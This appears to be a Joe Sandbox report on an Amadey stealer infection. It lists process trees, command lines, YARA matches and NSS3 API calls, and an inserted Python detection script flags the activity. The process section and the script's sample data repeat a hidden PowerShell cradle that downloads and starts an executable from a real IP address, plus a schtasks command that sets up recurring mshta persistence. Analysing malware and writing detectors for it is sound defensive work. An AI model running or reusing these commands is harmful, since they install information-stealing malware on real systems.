                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:03:49:32
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Imagebase:0x7ff7542e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:03:49:32
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:03:49:32
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7542e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:03:49:32
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:03:49:33
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7542e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:03:49:33
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:03:49:35
Start date:31/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "C:\Temp\.hta"
Imagebase:0x7ff764df0000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:03:49:35
Start date:31/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /delete /tn "AutoRunHTA" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:03:49:35
Start date:31/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:03:49:35
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:03:49:35
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                        Start time:03:49:37
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000003A.00000002.2789901199.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                        Start time:03:49:38
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\YQNZByFp\jyidkjkfhjawd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\YQNZByFp\jyidkjkfhjawd.exe"
                                                                                                                                                                                                                        Imagebase:0xc00000
                                                                                                                                                                                                                        File size:1'282'048 bytes
                                                                                                                                                                                                                        MD5 hash:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:63
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:64
                                                                                                                                                                                                                        Start time:03:49:41
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:65
                                                                                                                                                                                                                        Start time:03:49:41
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:66
                                                                                                                                                                                                                        Start time:03:49:43
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7542e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:03:49:43
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:03:49:44
Start date:31/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "C:\Temp\.hta"
Imagebase:0x7ff764df0000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:03:49:44
Start date:31/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /delete /tn "AutoRunHTA" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:03:49:44
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:03:49:44
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:72
Start time:03:49:45
Start date:31/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:03:49:47
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:0x5f0000
File size:3'243'520 bytes
MD5 hash:375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000049.00000002.2882969985.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
Has exited:true
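The command lines above spell out the chain that ends in Target ID 73: a hidden PowerShell cradle downloads random.exe into %TEMP% under a hex-looking name and starts it, while schtasks deletes and re-creates an "AutoRunHTA" task that copies any .gif in C:\Temp to random.hta and launches it through mshta every 25 minutes with /rl HIGHEST. As an added example (not part of the Joe Sandbox report or its tooling), the Python below runs detection heuristics over those command lines and correlates them: the download cradle is linked to the later execution of the file it wrote, and the task creation is linked to the preceding deletion of the same task name. The sample event list is constructed from the process section above; the (Target ID, image, command line) tuple layout, the rule names and the regexes are assumptions standing in for a real process-creation log source such as Sysmon Event ID 1.

```python
"""Heuristic triage of the process command lines shown in this report.

Added example; the tuple layout is an assumption standing in for a real
process-creation log (Sysmon Event ID 1, EDR telemetry, sandbox export).
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    target_id: int
    technique: str
    detail: str


# Constructed from the report's process section: (Target ID, image path, command line).
SAMPLE_EVENTS = [
    (67, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"'),
    (68, r"C:\Windows\System32\mshta.exe", r'mshta "C:\Temp\.hta"'),
    (69, r"C:\Windows\System32\schtasks.exe", r'schtasks /delete /tn "AutoRunHTA" /f'),
    (70, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;'''),
    (71, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (72, r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f'),
    (73, r"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe",
     r'"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"'),
]

URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
TASK_ACTION_RE = re.compile(r'/tr\s+"(.*)"\s+/sc\b', re.I)   # greedy: action may contain escaped quotes
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|"
                         r"\b(iwr|irm|curl|wget)\b|Start-BitsTransfer", re.I)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|Invoke-Item|\b(iex|saps)\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Temp|AppData|Users\\Public|ProgramData)\\", re.I)
EXE_REF_RE = re.compile(r"""([^\\/'"\s]+)\.exe""", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    findings = []
    downloaded = {}      # exe stem written by a cradle -> Target ID of the downloader
    deleted_tasks = {}   # task name (lowercase) -> Target ID that deleted it
    for tid, image, cmd in events:
        exe = basename(image)
        if exe == "schtasks.exe":
            m = TASK_NAME_RE.search(cmd)
            name = m.group(1) if m else "?"
            if re.search(r"/delete\b", cmd, re.I):
                deleted_tasks[name.lower()] = tid
            if re.search(r"/create\b", cmd, re.I):
                a = TASK_ACTION_RE.search(cmd)
                action = a.group(1) if a else cmd
                if re.search(r"mshta|\.hta\b", action, re.I):   # task action drives an HTA
                    detail = f'task "{name}" action: {action}'
                    if name.lower() in deleted_tasks:
                        detail += f" (same task deleted by Target ID {deleted_tasks[name.lower()]} just before)"
                    if re.search(r"/rl\s+HIGHEST", cmd, re.I):
                        detail += "; requests /rl HIGHEST"
                    findings.append(Finding(tid, "scheduled-task HTA persistence", detail))
        elif exe == "powershell.exe":
            if DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):   # fetch and run in one command line
                urls = URL_RE.findall(cmd)
                hidden = bool(re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I))
                findings.append(Finding(tid, "download-and-execute cradle",
                                        f"urls={urls}; hidden window={hidden}"))
                # remember every .exe the cradle names other than powershell itself
                for stem in EXE_REF_RE.findall(cmd):
                    if stem.lower() + ".exe" != exe:
                        downloaded[stem.lower()] = tid
        elif exe == "mshta.exe":
            args = cmd.split(None, 1)[1] if " " in cmd else ""
            # HTA launched from a user-writable directory, or with no base name at all (".hta")
            if USER_WRITABLE_RE.search(args) or re.search(r"\\\.hta\b", args):
                findings.append(Finding(tid, "mshta from user-writable path", args.strip('"')))
        else:
            stem = exe[:-4] if exe.endswith(".exe") else exe
            if stem in downloaded:
                findings.append(Finding(tid, "execution of a PowerShell-downloaded payload",
                                        f"{image} fetched by Target ID {downloaded[stem]}"))
    return findings


def summarize(events):
    """(Target ID, technique) pairs, sorted, for quick comparison."""
    return sorted((f.target_id, f.technique) for f in analyze(events))


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.target_id}] {f.technique}: {f.detail}")
```

Run against the constructed events, this flags Target IDs 68, 70, 72 and 73 and leaves the random-name PowerShell (67), the task deletion (69) and conhost (71) unflagged; the deletion is only consumed as context for the re-creation. The regexes are deliberately narrow to the strings in this report, so treat them as a starting point rather than a production rule set.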

APIs
• PR_CallOnce.NSS3(6C5D2120,6C487E60), ref: 6C486EBC
• TlsGetValue.KERNEL32 ref: 6C486EDF
• EnterCriticalSection.KERNEL32(?), ref: 6C486EF3
• PR_WaitCondVar.NSS3(000000FF), ref: 6C486F25
  • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
  • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
• PR_Unlock.NSS3 ref: 6C486F68
• PORT_ZAlloc_Util.NSS3(00000008), ref: 6C486FA9
• TlsGetValue.KERNEL32 ref: 6C4870B4
• EnterCriticalSection.KERNEL32(?), ref: 6C4870C8
• PR_CallOnce.NSS3(6C5D24C0,6C4C7590), ref: 6C487104
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487117
• SECOID_Init.NSS3 ref: 6C487128
• PORT_Alloc_Util.NSS3(00000057), ref: 6C48714E
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48717F
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4871A9
• PR_NotifyAllCondVar.NSS3 ref: 6C4871CF
• PR_Unlock.NSS3 ref: 6C4871DD
• free.MOZGLUE(?), ref: 6C4871EE
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487208
• free.MOZGLUE(00000000), ref: 6C487221
• free.MOZGLUE(00000001), ref: 6C487235
• TlsGetValue.KERNEL32 ref: 6C48724A
• EnterCriticalSection.KERNEL32(?), ref: 6C48725E
• PR_NotifyCondVar.NSS3 ref: 6C487273
• PR_Unlock.NSS3 ref: 6C487281
• SECMOD_DestroyModule.NSS3(00000000), ref: 6C487291
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872B1
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872D4
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872E3
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487301
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487310
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487335
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487344
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487363
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487372
• PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C5C0148,,defaultModDB,internalKeySlot), ref: 6C4874CC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487513
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C48751B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487528
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C48753C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487550
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487561
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487572
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487583
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487594
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4875A2
                                                                                                                                                                                                                          • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C4875BD
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4875C8
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4875F1
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C487636
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487686
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C4876A2
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000050), ref: 6C4876B6
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C487707
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C48771C
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C487731
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C48774A
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C487770
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C487779
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48779A
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4877AC
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(-0000000D), ref: 6C4877C4
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4877DB
                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(?,0000002F), ref: 6C487821
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C487837
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C48785B
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C48786F
                                                                                                                                                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878AC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4878BE
                                                                                                                                                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878F3
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4878FC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C48791C
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
